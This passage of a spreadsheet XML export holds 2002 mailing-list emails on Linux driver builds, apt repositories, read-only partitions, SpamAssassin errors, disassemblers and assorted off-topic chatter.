    <t>This is preaty neat.\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\nPitch Dark Bar Opens for Blind Dates\nThu Sep 5,10:09 AM ET\n\nBERLIN (Reuters) - Diners at Berlin's newest restaurant cannot see what they\nare eating and have to be guided to their table by blind waiters because the\nbar is pitch black.\n\nThe restaurant, which opened Wednesday, aims to make guests concentrate on\nsenses other than sight.\n\nHolding on to one another, the first visitors followed waiter Roland\nZimmermann, 33, into the dining room. Although the PhD student has been\nblind since childhood, he is the only one able to point out chairs, cutlery\nand drinks.\n\n"I'm putting your plate right in front of you," Zimmermann said. "I can't\nfind my mouth," one voice replied out of the dark. "I wonder what this dish\nis -- Lasagne? Or some casserole?" another invisible guest said.\n\nIn the "unsicht-Bar," which means invisible in German, diners cannot choose\ncomplete dishes from the menu but can only indicate whether they would like\na fish, meat or vegetarian option.\n\n"We want people to have an extraordinary experience of tasting, feeling and\nsmelling," said Manfred Scharbach, head of the organization for blind and\nsight-restricted people, which is running the bar.\n\n"People are surprised that their tongues and taste senses are taking over\nand are sending signals, which their eyes would normally have sent," he\nadded.\n\nOf the 30 staff, 22 are blind.\n\nAn average meal lasts about three hours and the waiters are always around to\nhelp, Scharnbach said.\n\nAnd at the end of the night, they will even reveal what customers have\nactually been eating.</t>
  </si>
  <si>
    <t>To: nan\nFrom: whisper@oz.net (David LeBlanc)\nDate: Thu, 5 Sep 2002 15:42:38 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 15:42:38 -0700</t>
  </si>
  <si>
    <t>whisper@oz.net (David LeBlanc)</t>
  </si>
  <si>
    <t>[Spambayes] All but one testing</t>
  </si>
  <si>
    <t>Errr... not to be pedantic or anything, but this is called "omit one\ntesting" or OOT in the literature IIRC. Helpful in case you're searching for\nadditional information, say at [URL]http://citeseer.nj.nec.com[/URL] for instance.\n\nDavid LeBlanc\nSeattle, WA USA</t>
  </si>
  <si>
    <t>http://citeseer.nj.nec.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: eric nichols &lt;matchsprint@trackbike.com&gt;\nDate: Thu, 5 Sep 2002 15:17:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 15:17:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>eric nichols &lt;matchsprint@trackbike.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] PCTel modules</t>
  </si>
  <si>
    <t>Hello again. I tried all the suggestions for the PCTel driver and at the end of it, everything still goes smoothly until I type "make" after I get the output from the ./configure. \n\nHowever, there were a couple of things I noticed along the way. After typing \n* cp configs/kernel-2.4...config .config\n* make oldconfig\n* make dep\nThe 2nd to last line I got back said that the modversions.h file was not updated. When I looked at this path to the modversions.h file, it was 281 lines and every line started with a # mark. Is it the case that nothing is read on a line after a # mark (or am I just thinking of another language?) and so should I delete the # at certain places?\n\nAlso, when I was in the pctel directory and typed "make", I noticed that a different subdirectory is taken to a different modversions.h file. Inside this other file, there's nothing at all. And so I moved the modversions.h file with 281 lines to the empty modversions.h file - and got a different reply after "make". The output after I moved the file over mostly looked like this:\n/usr/src/linux-2.4.18-3/linux/modversions.h:11:33: linux/modules/adb.ver: No such file or directory\n/usr/src/linux-2.4.18-3/linux/modversions.h:12:37: linux/modules/af_ax25.ver: No such file or directory\n/usr/src/linux-2.4.18-3/linux/modversions.h:13:36: linux/modules/af_ipx.ver: No such file or directory\n\nThe odd lines being the path and the first half of the other lines are what's written after the # in the modversions.h file. Should there be a file at each of these (one at each of the 281 lines of the file) that I'd have to compile/make?\n\nIt's taken plenty of elbow grease, but I'm glad it hasn't gone smoothly, it's a good learning experience. Again, any help is appreciated. Thanks, Eric\n\n_____________________________________________________________\nemail services provided by trackbike.com, your source for alleycat and trackbike photos. submissions welcome.\n\n_____________________________________________________________\nPromote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net  [URL]http://www.everyone.net[/URL]\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.everyone.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: bmord@icon-nicholson.com (Ben Mord)\nFrom: George Dinwiddie &lt;gdinwiddie@min.net&gt;\nDate: Thu, 5 Sep 2002 15:08:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 15:08:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>George Dinwiddie &lt;gdinwiddie@min.net&gt;</t>
  </si>
  <si>
    <t>&gt; Ben Mord said:\n&gt; \n&gt; &gt;Ah. In that case, you can use something considerably less powerful than\n&gt; &gt;VMWare. All you need is a machine configured to boot from CD-ROM and use\n&gt; &gt;a RAM disk for scratch space. Numerous Linux distros are available that\n&gt; &gt;let you boot a stateless but functional system from CD-ROM.\n&gt; \n&gt; But RAM is expensive, and the directory structures of many systems (e.g.\n&gt; Windows) are not sufficiently organized and standardized to make this\n&gt; combination of bootable CDs and RAM drives practical. Even if you are\n&gt; fortunate enough to be using Linux (or another FHS-compliant *nix), you\n&gt; still can't fit a lot on a CD. Its not unusual today to have gigabytes of\n&gt; static multimedia content on the web server. This particular problem can be\n&gt; alleviated somewhat by using DVDs, but this is a temporary solution at best\n&gt; which will become outdated quickly as our data requirements grow and hard\n&gt; drives become cheaper.\n\nSo, just write-protect the hard disk for partitions that are static.\nI seem to recall an article on this (early 80's, Byte magazine, perhaps?)\nfor BBS systems or for testing unknown (perhaps trojan horse) software.\n\n - George\n\n-- \n ----------------------------------------------------------------------\n  George Dinwiddie                             gdinwiddie@alberg30.org\n  The gods do not deduct from man's allotted span those hours spent in\n  sailing.                                    [URL]http://www.Alberg30.org[/URL]\n ----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://www.Alberg30.org</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@cs.helsinki.fi&gt;\nDate: Thu, 5 Sep 2002 14:36:39 +0300</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 14:36:39 +0300</t>
  </si>
  <si>
    <t>Re: apt and a hybrid system</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 12:32:58PM +0200, Axel Thimm wrote: &gt; On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote: &gt; &gt; If I can use apt, can I use it to get updates from these 3 different &gt; &gt; places: &gt; &gt; 1. the (null) up2date Redhat upgrades &gt; &gt; 2. the (null) files at Freshrpms.net &gt; &gt; 3. the regular RH7.3 files from freshrpms.net &gt; You could build your own apt-repository. Just mirror the needed &gt; directories (e.g. by using a wget cron job), symlink the needed rpms &gt; and recreate the repository. It is already worth the trouble, if you &gt; have more than one installation. Always nice to have one to put stuff that overrides RH things. Like if you absolutely detest qt and some programs are rebuildable from sources with different %configure options. You can get src.rpm, edit spec, bump release numberwith your initials and another number and rebuild, insert into apt and let loose... :) Doesn't freshrpms have updates dir too? Maybe not quite as up to date as up2date but still. I would never use up2date. There is another repository at apt-rpm.tuxfamily.org IIRC. Not sure if that had The updates. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Thu, 5 Sep 2002 14:32:42 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 14:32:42 -0400</t>
  </si>
  <si>
    <t>On Wednesday 04 September 2002 10:59 pm, CDale wrote:\n&gt; Someone needs to tell the mayor about this:\n&gt; [URL]http://www.cb-2000.com[/URL]\n\n"Chastity" technologies were doomed from the start, and I'll add chemical \nones to the trash heap.  (Yeah, Cindy, these are decorative toys for the \nsubculture, but....)  \n\nGenerally,someone is attempting to preserve a relationship with this \nnonsense, when quite plainly the the relationship is in a state where \npreserving it is of little value.  Hardware is of no real use save for \nplaying the power-struggle game.   I don't want to see the future of this.\n"Invisible Fence" for your mate.   "Must wear" location transponders and \nendocrine monitors.   More movies like "Minority Report."\n\nIt seems so automatic for people to reach for coercive solutions.   So \nsurprizing given the low absolute effectiveness of coercion in the absense \nof overwhelming force advantage.\n\nEirikur</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Thu, 5 Sep 2002 13:59:19 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 13:59:19 -0700</t>
  </si>
  <si>
    <t>SoE at UCSC looking for an experienced IT support person</t>
  </si>
  <si>
    <t>Hi all,\n\nWe're looking for an experienced IT support person in the School of\nEngineering at UC Santa Cruz -- please foward to anyone who you think might\nbe interested.\n\n- Jim\n\n-----Original Message-----\nFrom: Michael Perrone [mailto:mperrone@cs.ucsc.edu]\nSent: Thursday, September 05, 2002 12:31 PM\nTo: techstaff@cse.ucsc.edu\nSubject: Recruiting for PAIII-IV Supervisor\n\n\n\nDear SoE Community,\n\nForgive the spam, but I wanted to make sure that everyone is aware that\nwe are recruiting to replace the position vacated by Gary Moro.\n\nThis is a technical position with supervisor responsibilities. The focus is\non Solaris and Linux systems administration with Veritas and Irix experience\na plus.\n\nThe posting is here:\n\n[URL]http://www2.ucsc.edu[/URL]\n\nRegards,\n\nMichael Perrone</t>
  </si>
  <si>
    <t>http://www2.ucsc.edu</t>
  </si>
  <si>
    <t>To: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nFrom: Artem Frolov &lt;frolov@sigma.ispras.ru&gt;\nDate: Thu, 5 Sep 2002 13:49:38 +0400 (MSD)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 13:49:38 +0400 (MSD)</t>
  </si>
  <si>
    <t>Artem Frolov &lt;frolov@sigma.ispras.ru&gt;</t>
  </si>
  <si>
    <t>Hi On Wed, 4 Sep 2002, Yannick Gingras wrote: &gt; BTW thanks for all of you who provided interestiong insight.  I'm playing with  &gt; gdb's dissassembler now but I don't think it's what a typical cracker would  &gt; use.  Any hints on UNIX cracking tools ? There's also an 'objdump' program, and 'biew' hex viewer/disassembler. A good  starting point to search is [URL]http://www.freshmeat.net[/URL] However, cracking and reverse engineering tools are not so ubiquitous on UNIX as  they are on Windows platform for two main reasons: 1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...) are  respectable companies. They are ready to pay big bucks for software they need: the reputation matters. 2. Most software for free and open source Unices like Linux and xBSD (this  software often may be used on commercial unices as well) is, well, free and  open source. Regards /Artem --   Artem Frolov  /------------------------------------------------------------------\  Software Engineer, System Administrator                         Institute for System Programming, Russian Academy of Sciences       Tel. +7 095 912-5317 (ext 4406), Cellular: +7 095 768-7067  C7 40 CA 41 2A 18 89 D6  29 45 DF 50 75 13 6D 7A  A4 87 2B 76 \------------------------------------------------------------------/ ------------------------------------------------------------------ Basic Definitions of Science: 	If it's green or wiggles, it's biology. 	If it stinks, it's chemistry. 	If it doesn't work, it's physics. ------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://www.freshmeat.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Thu, 5 Sep 2002 13:18:24 +0200</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 13:18:24 +0200</t>
  </si>
  <si>
    <t>Re: [SAtalk] PerMsgStatus.pm error?</t>
  </si>
  <si>
    <t>On Thursday 05 September 2002 04:10 CET Mike Burger wrote: &gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and &gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running &gt; on it. &gt; &gt; I'm getting messages that seem to indicate that SA can't find &gt; PerMsgStatus, like so: &gt; &gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML &gt; SpamAssassin test, skipping: ^I(Can't locate object method &gt; "check_for_content_type_just_html" via package &gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load &gt; "Mail::SpamAssassin::PerMsgStatus"?) at &gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line &gt; 1814,  line 21. ) &gt; &gt;[...] &gt; &gt; Any ideas? Perl doesn't complain that it can't find PerMsgStatus.pm but the function  check_for_content_type_just_html(). Do you probably have some old rules  files still lurking around? This test existed in 2.31 but is gone/was  renamed with 2.40. Malte --  -- Coding is art. --  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Axel Thimm &lt;Axel.Thimm@physik.fu-berlin.de&gt;\nDate: Thu, 5 Sep 2002 12:32:58 +0200</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 12:32:58 +0200</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote: &gt; If I can use apt, can I use it to get updates from these 3 different places: &gt; 1. the (null) up2date Redhat upgrades &gt; 2. the (null) files at Freshrpms.net &gt; 3. the regular RH7.3 files from freshrpms.net You could build your own apt-repository. Just mirror the needed directories (e.g. by using a wget cron job), symlink the needed rpms and recreate the repository. It is already worth the trouble, if you have more than one installation. In any case in order to acces the mentioned places, somebody must keep such a repository up to date, be it yourself or someone else. --  Axel.Thimm@physik.fu-berlin.de _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Crispin Cowan &lt;crispin@wirex.com&gt;\nFrom: Brian Hatch &lt;secprog@ifokr.org&gt;\nDate: Thu, 5 Sep 2002 11:33:21 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 11:33:21 -0700</t>
  </si>
  <si>
    <t>Brian Hatch &lt;secprog@ifokr.org&gt;</t>
  </si>
  <si>
    <t>--2+N3zU4ZlskbnZaJ\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\n\n\n&gt; Simple approxmation to this: make /usr a separate partion, and mount it=\n=20\n&gt; read-only:\n&gt;=20\n&gt;    * The good news: attackers that want to trojan your software have to\n&gt;      reboot, at least.\n&gt;    * The bad news: administrators that want to update your software\n&gt;      have to reboot, at least.\n\nNo reboot is required, you just need to remount it:\n\n	# mount -o remount,rw /usr\n\nThis requires root access, but presumably /usr is safe from non-root\nusers anyway.\n\nOnly way to disable this is to have the kernel compiled with something\nthat compartmentalizes capabilities (LIDS/etc on Linux for example) or to\nremove CAP_SYS_ADMIN with lcap, which would definately require a reboot,\nand possibly break some other functionatily to boot.  (Pun intended.  My\napologies.)\n\n--\nBrian Hatch                  "Are you expected?"\n   Systems and               "No.  Dreaded."\n   Security Engineer\n[URL]www.hackinglinuxexposed.com[/URL]\n\nEvery message PGP signed\n\n--2+N3zU4ZlskbnZaJ\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niEYEARECAAYFAj13o3EACgkQp6D9AhxzHxDMkACfR3m+eBXLfiZUFRd+jlBwu4MH\nZ/kAnRVbL3IA/m03PVTM6O4h9R4AKqML\n=k5cA\n-----END PGP SIGNATURE-----\n\n--2+N3zU4ZlskbnZaJ--</t>
  </si>
  <si>
    <t>www.hackinglinuxexposed.com http://www.gnupg.org</t>
  </si>
  <si>
    <t>To: "SpamAssassin Users' list" &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Brian May" &lt;brian@unearthed.com&gt;\nDate: Thu, 5 Sep 2002 10:51:23 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 10:51:23 -0700</t>
  </si>
  <si>
    <t>"SpamAssassin Users' list" &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] [OT] SpamAssassin figures...</t>
  </si>
  <si>
    <t>sorry for the dupe.. thought the com address would bounce.. my bad.\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Fork@Xent.Com" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Bill Stoddard" &lt;bill@wstoddard.com&gt;\nDate: Thu, 5 Sep 2002 10:40:04 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 10:40:04 -0400</t>
  </si>
  <si>
    <t>RE: Re[2]: Java is for kiddies</t>
  </si>
  <si>
    <t>&gt; -----Original Message----- &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Karl &gt; Anderson &gt; Sent: Thursday, September 05, 2002 3:50 AM &gt; To: bitbitch@magnesium.net &gt; Cc: 'fork@spamassassin.taint.org' &gt; Subject: Re: Re[2]: Java is for kiddies &gt; &gt; &gt; bitbitch@magnesium.net writes: &gt; &gt; &gt; SL&gt;  &gt; &gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good &gt; programmer, etc. &gt; &gt; SL&gt;  &gt; &gt;  &gt; &gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey, &gt; jobs are hard to &gt; &gt; SL&gt; come by. There's a company hiring in Mountain View, looking &gt; for a few good &gt; &gt;  &gt; &gt; &gt; &gt; I give Adam an hour or so to come up with an adequate number of &gt; &gt; excuses as to why -this- job isn't worth it.  :) &gt; &gt; [URL]http://www.netli.com[/URL] &gt; &gt; &gt;* Along with your resume, please answer this question: What does &gt; this _x0013_C_x0014_ statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m) &gt; &gt; Besides provide job security? This is more useful... #define CONTAINING_RECORD(address, type, field) ((type *)( \                                                   (PCHAR)(address) - \                                                   (PCHAR)(&amp;((type *)0)-&gt;field))) Bill</t>
  </si>
  <si>
    <t>To: SECPROG Securityfocus &lt;SECPROG@securityfocus.com&gt;\nFrom: Andrey Kolishak &lt;andr@sandy.ru&gt;\nDate: Thu, 5 Sep 2002 10:17:03 +0200</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 10:17:03 +0200</t>
  </si>
  <si>
    <t>Andrey Kolishak &lt;andr@sandy.ru&gt;</t>
  </si>
  <si>
    <t>SECPROG Securityfocus &lt;SECPROG@securityfocus.com&gt;</t>
  </si>
  <si>
    <t>Re: use of base image / delta image for automated recovery from attacks</t>
  </si>
  <si>
    <t>take a look at [URL]http://www.pcworld.com[/URL],aid,102881,00.asp\n\n Andrey                            mailto:andr@sandy.ru\n\n\n\nBM&gt; Does anyone do this already? Or is this a new concept? Or has this concept\nBM&gt; been discussed before and abandoned for some reasons that I don't yet know?\nBM&gt; I use the physical architecture of a basic web application as an example in\nBM&gt; this post, but this concept could of course be applied to most server\nBM&gt; systems. It would allow for the hardware-separation of volatile and\nBM&gt; non-volatile disk images. It would be analogous to performing nightly\nBM&gt; ghosting operations, only it would be more efficient and involve less (or\nBM&gt; no) downtime.\n\nBM&gt; Thanks for any opinions,\nBM&gt; Ben</t>
  </si>
  <si>
    <t>http://www.pcworld.com</t>
  </si>
  <si>
    <t>To: "SpamAssassin Users' list" &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Brian May" &lt;brian@unearthed.org&gt;\nDate: Thu, 5 Sep 2002 10:14:46 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 10:14:46 -0700</t>
  </si>
  <si>
    <t>"Brian May" &lt;brian@unearthed.org&gt;</t>
  </si>
  <si>
    <t>[SAtalk] [OT] SpamAssassin figures...</t>
  </si>
  <si>
    <t>I finally found the SpamAssassin ninja's!  After months of searchng.. I\nfound the litte guys at a bowling alley in Valencia!  Here's a shot of my\nbeloved clan!\n\n[URL]http://www.mattahfahtu.com[/URL]\n\n\n\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http://www.mattahfahtu.com https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Thu, 5 Sep 2002 07:33:15 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 07:33:15 -0500 (EST)</t>
  </si>
  <si>
    <t>It's possible...I performed the update via "rpm -U"...which, of course,  created all the new rulesets as "xx_rulename.cf.rpmnew"  Crud.  I'll have  to start moving things around. On Thu, 5 Sep 2002, Malte S. Stretz wrote: &gt; On Thursday 05 September 2002 04:10 CET Mike Burger wrote: &gt; &gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and &gt; &gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running &gt; &gt; on it. &gt; &gt; &gt; &gt; I'm getting messages that seem to indicate that SA can't find &gt; &gt; PerMsgStatus, like so: &gt; &gt; &gt; &gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML &gt; &gt; SpamAssassin test, skipping: ^I(Can't locate object method &gt; &gt; "check_for_content_type_just_html" via package &gt; &gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load &gt; &gt; "Mail::SpamAssassin::PerMsgStatus"?) at &gt; &gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line &gt; &gt; 1814,  line 21. ) &gt; &gt; &gt; &gt;[...] &gt; &gt; &gt; &gt; Any ideas? &gt;  &gt; Perl doesn't complain that it can't find PerMsgStatus.pm but the function  &gt; check_for_content_type_just_html(). Do you probably have some old rules  &gt; files still lurking around? This test existed in 2.31 but is gone/was  &gt; renamed with 2.40. &gt;  &gt; Malte &gt;  &gt;  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nDate: Thu, 5 Sep 2002 06:39:04 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 06:39:04 -0400</t>
  </si>
  <si>
    <t>&gt; However, cracking and reverse engineering tools are not so ubiquitous on\n&gt; UNIX as they are on Windows platform for two main reasons:\n&gt;\n&gt; 1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...)\n&gt; are respectable companies. They are ready to pay big bucks for software\n&gt; they need: the reputation matters.\n&gt;\n&gt; 2. Most software for free and open source Unices like Linux and xBSD (this\n&gt; software often may be used on commercial unices as well) is, well, free and\n&gt; open source.\n\nThanks to your answers, I start to see where I should head for.  What are your \nsugestions for protecting a 100% online requirement system ?\n\n-- \nYannick Gingras\nCoder for OBB : Observing Bantu-speaking Butanone\n[URL]http://OpenBeatBox.org[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: rob bains &lt;robinderbains@shaw.ca&gt;\nDate: Thu, 31 Jan 2002 22:44:14 -0700</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 22:44:14 -0700</t>
  </si>
  <si>
    <t>rob bains &lt;robinderbains@shaw.ca&gt;</t>
  </si>
  <si>
    <t>Please help a newbie compile mplayer :-)</t>
  </si>
  <si>
    <t>Hello,              I just installed redhat 7.2 and I think I have everything  working properly.  Anyway I want to install mplayer because I heard it  can play quicktime movs.  I apt-get source mplayer and dl'd it to  /usr/src.           I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm,  then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.          Any help or a link to some document would be appreciated, Thanks -rob _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Stephen D. Williams" &lt;sdw@lig.net&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Thu, 3 Oct 2002 23:24:15 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 23:24:15 -0400</t>
  </si>
  <si>
    <t>"Stephen D. Williams" &lt;sdw@lig.net&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: Living Love - Another legacy of the 60's</t>
  </si>
  <si>
    <t>draw the pain\n\n"Ken never wrote about this method, but he often demonstrated it in\nworkshops. Let us say you have a physical pain somewhere in your body. You\ndraw the pain in the air with your finger, about 30 cm (1 foot) high. Take\nabout 60 seconds to trace around the perimeter of the pain, carefully\nlistening to the pain to find the precise boundary between where it hurts\nand where it does not. Repeat. You will find that after about 10 minutes of\nthis the pain will shift, shrink or disappear. A variant of this is to\nimagine making a 3D model the pain in coloured clay."\n\nWorks!  There's this coworker - a real pain in my ass!  I used my middle\nfinger to trace his outline for about 60 seconds.  I listened to him, found\nthe boundary, and repeated the motion.  He left my office!\n\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of\nStephen D. Williams\nSent: Thursday, October 03, 2002 5:33 PM\nTo: fork@spamassassin.taint.org\nSubject: Living Love - Another legacy of the 60's\n\n\nNormally, I disdain any kind of mysticism, even when it is associated\nwith fairly good ideas.  Just a big turnoff.  A good example would be\nthe difference between Yoga/TM and the more scientifically pure, but\nrelated, relaxation techniques including "betagenics",\nhypnosis/auto-hypnosis, etc.  (This was one of the many topics I\nobsessively absorbed as a teenager.)  Or Tai Chi etc. vs. Tai Bo /\nG-Force Dyno-Staff.\n\nI have to say however that, having found this while looking for\nsomething completely unrelated, it has some cute truisms.  I\nparticularly like their addiction to non-addiction.  Additionally, the\nMindprod treehugger site has some interesting quotes, etc.\n\nTo my internal ear, nearly all of these 60's based new-age vernacular\nseem to assume that you are a simple child (of the 60's?) who needs some\nreligion-like couching of ideas to relate and internalize.  Very\nirritating, but taken in small doses it's interesting to compare and\ncontrast with our (my) modern mental models.\n\nI found that a few of the principles could be used to explain and\njustify US/UN foreign policy and actions.\n\n[URL]http://mindprod.com[/URL]\n[URL]http://members.aol.com[/URL]\n[URL]http://www.mindprod.com[/URL]\n(Apologies for the embedded HTML.)\n\nWe create the world we live in.\nA loving person lives in a loving world,\nA hostile person lives in a hostile world.\nEveryone you meet is your mirror.\n\nYou make yourself and others suffer just as much when you take offence\nas when you give offence. To be upset over what you don't have is to\nwaste what you do have.\n\nThe past is dead,\nThe future is imaginary,\nHappiness can only be\nin the Eternal Now Moment\n\nHow soon will you realize that the only thing you don't have is the\ndirect experience that there's nothing you need that you don't have.\n\nLove a person because he or she is there.\nThis is the only reason.\n\nHappiness happens when your consciousness is not dominated by addictions\nand demands~ and you experience life as a parade of preferences.\n\nThe\npurpose\nof our lives\nis to be free\nof all addictive traps,\nand thus\nbecome one\nwith the ocean of\nLiving Love.\n\n\nsdw\n\n--\nsdw@lig.net [URL]http://sdw.st[/URL]\nStephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622\n703-724-0118W 703-995-0407Fax Dec2001</t>
  </si>
  <si>
    <t>http://mindprod.com http://members.aol.com http://www.mindprod.com http://sdw.st</t>
  </si>
  <si>
    <t>To: Fork@xent.com\nFrom: bitbitch@magnesium.net\nDate: Thu, 3 Oct 2002 23:23:19 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 23:23:19 -0400</t>
  </si>
  <si>
    <t>Blatantly stolen from a friend's LJ</t>
  </si>
  <si>
    <t>Hello Fork,\n\n  [URL]http://www.pimprig.com[/URL]\n\n  This kid has -way- WAY too much time on his hands.\n\n-- \nBest regards,\n bitbitch                          mailto:bitbitch@magnesium.net</t>
  </si>
  <si>
    <t>http://www.pimprig.com</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: Duncan Findlay &lt;duncf@debian.org&gt;\nDate: Thu, 3 Oct 2002 20:25:58 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 20:25:58 -0400</t>
  </si>
  <si>
    <t>Duncan Findlay &lt;duncf@debian.org&gt;</t>
  </si>
  <si>
    <t>Re: [SAdev] Re: Web subscription for spamassassin package</t>
  </si>
  <si>
    <t>&gt; eh? any reason why?  wasn't causing any trouble for me, and\n&gt; seems like a good idea.\n\nBecause every time someone submitted a bug, they'd get a response\nsaying "Message is held for moderator because of implicit message\ndestination" or something like that. It annoyed users, it annoyed me,\nand Justin, you never actually got around to accepting the messages :-)\n\n-- \nDuncan Findlay\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: dcsb@ai.mit.edu, cryptography@wasabisystems.com,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Thu, 3 Oct 2002 20:13:32 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 20:13:32 -0400</t>
  </si>
  <si>
    <t>dcsb@ai.mit.edu, cryptography@wasabisystems.com,</t>
  </si>
  <si>
    <t>Re: The 3rd Annual Consult Hyperion Digital Identity Forum</t>
  </si>
  <si>
